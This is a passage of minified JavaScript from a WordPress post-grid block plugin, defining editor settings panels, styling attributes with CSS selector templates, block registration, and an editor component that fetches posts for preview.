Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imgMargin","imgWidth","imageScale","imgHeight"],exStyle:["imgMargin","imgWidth","imageScale","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},92829:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},columnFlip:{type:"boolean",default:!1},columnGridGap:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}); } \n          {{ULTP}} .ultp-layout4 .ultp-block-item:first-child .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}*2); } \n          {{ULTP}} .ultp-block-row { grid-row-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-block-row {grid-column-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"500",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row .ultp-block-item:first-child {max-height: {{overlayHeight}};} \n          {{ULTP}} .ultp-layout1 .ultp-block-item:not(:first-child) .ultp-block-content-overlay {height: calc({{overlayHeight}}/2);} \n          {{ULTP}} .ultp-layout4 .ultp-block-item:not(:first-child) .ultp-block-content-overlay {height: calc({{overlayHeight}}/3);} \n          {{ULTP}} .ultp-layout2 .ultp-block-item:nth-child(2) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout3 .ultp-block-item:nth-child(3) .ultp-block-content-overlay {height: calc( {{overlayHeight}}/2.5 );} \n          {{ULTP}} .ultp-layout3 .ultp-block-item:nth-child(2) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-item:nth-child(3) .ultp-block-content-overlay {height: calc( {{overlayHeight}}/1.666 );} \n          {{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } @media (max-width: 768px) { \n          {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n          {{ULTP}} .ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 );}}"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},queryNumber:{type:"string",default:"3",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]},{key:"querySticky",condition:"!=",value:!0}]}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square"},imgAnimation:{type:"string",default:"zoomIn"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"flat",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},metaListSmall:{type:"string",default:'["metaAuthor","metaDate"]'},showSmallCat:{type:"boolean",default:!0},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},headingText:{type:"string",default:"Post Grid #4"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }{{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"navigation"},pagiMargin:{type:"object",default:{lg:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul { margin:{{pagiMargin}}; }"}]},pagiAlign:{type:"object",default:{lg:"left"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-loadmore, {{ULTP}} .ultp-next-prev-wrap ul, {{ULTP}} .ultp-pagination, {{ULTP}} .ultp-pagination-wrap { text-align:{{pagiAlign}}; }"}]},...(0,o.t)(["advFilter","heading","advanceAttr","pagiBlockCompatibility","pagination","video","meta","category","readMore","query"],["paginationAjax","pagiMargin","loadMoreText","pagiAlign","queryNumPosts","queryNumber"],[{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"readMoreColor",default:"#FFFFFF"}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},47127:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(12975),r=l(92829),s=l(57433);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-4/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-4.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid4.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-4")]},edit:n.Z,save:()=>null})},69234:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(11057);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useRef:_,useState:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=_(null),{setAttributes:l,name:B,clientId:U,className:M,attributes:A,isSelected:H,context:N,attributes:{blockId:j,excerptLimit:Z,showSmallMeta:O,metaStyle:R,metaShow:D,catShow:z,showImage:F,metaSeparator:W,titleShow:V,catStyle:G,catPosition:q,titlePosition:$,excerptShow:K,imgAnimation:J,imgOverlayType:Y,imgOverlay:X,metaList:Q,metaListSmall:ee,showSmallCat:te,readMore:le,readMoreText:oe,readMoreIcon:ae,overlayContentPosition:ie,showSmallBtn:ne,showSmallExcerpt:re,metaPosition:se,showFullExcerpt:pe,layout:ce,columnFlip:ue,titleAnimation:de,customCatColor:me,onlyCatColor:ge,contentTag:ye,titleTag:be,showSeoMeta:ve,titleLength:he,metaMinText:fe,metaAuthorPrefix:ke,titleStyle:we,metaDateFormat:xe,authorLink:Te,imgCrop:_e,imgCropSmall:Ce,fallbackEnable:Ee,vidIconEnable:Se,notFoundMessage:Pe,dcEnabled:Le,dcFields:Ie,previewImg:Be,advanceId:Ue,paginationShow:Me,headingShow:Ae,filterShow:He,paginationType:Ne,navPosition:je,querySticky:Ze,V4_1_0_CompCheck:{runComp:Oe},currentPostId:Re}}=e,[De,ze]=C(f.Ti),[Fe,We]=C(null);function Ve(e){ze({...De,selectedDC:e})}function Ge(){ze({...De,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function qe(e){ze({...De,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),We("setting")}function $e(e){ze((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function Ke(){De.error&&ze({...De,error:!1}),De.loading||ze({...De,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(A)}).then((e=>{ze({...De,postsList:e,loading:!1})})).catch((e=>{ze({...De,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),Ke()}),[]),T((()=>{const t=U.substr(0,6),o=L(I(U));(0,a.qi)(l,o,Re,U),(0,y.h)(e),j?j&&j!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[U]),T((()=>{const e=t.current;(0,b.o6)()&&0===A.dcFields.length&&l({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,A)&&(Ke(),t.current=A),e.isSelected!==H&&H&&(0,f.gT)(qe,$e)):t.current=A}),[A]),T((()=>{Ze&&l({queryNumber:"4"})}),[Ze]);const Je={settingTab:Fe,setSettingTab:We,setAttributes:l,name:B,attributes:A,setSection:qe,section:De.section,clientId:U,context:N,setSelectedDc:Ve,selectedDC:De.selectedDC,selectParentMetaGroup:function(e){Ve(e),$e("dc_group")}};let Ye;if(j&&(Ye=(0,m.Kh)(A,"ultimate-post/post-grid-5",j,(0,a.k0)())),Be&&!H)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Be});T((()=>{!H&&Be&&l({previewImg:""})}),[e?.isSelected]);const Xe=x({...Ue&&{id:Ue},className:`ultp-block-${j} ${M}`,onClick:e=>{e.stopPropagation(),qe("general"),$e("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:Je,selected:De.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:Je})),(0,o.createElement)(g.Z,{include:[{type:"query",exclude:["queryNumber","queryNumPosts"]},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-grid-5",key:"layout",options:[{img:"assets/img/layouts/pg5/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg5/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Oe?"exclude":"dep"]:a.N2,pro:["metaShow","catShow"]}],store:Je}),(0,o.createElement)("div",Xe,Ye&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Ye}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ae||He||Me)&&(0,o.createElement)(r.m,{attributes:A,setAttributes:l,onClick:()=>{qe("heading"),$e("heading")},setSection:qe,setToolbarSettings:$e}),function(){const e=`${ye}`,t=(e,t)=>(0,b.o6)()&&Le&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Ie,settingsOnClick:(e,t)=>{e?.stopPropagation(),$e(t)},selectedDC:De.selectedDC,setSelectedDc:Ve,setAttributes:l,dcFields:Ie});return De.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):De.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):De.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap 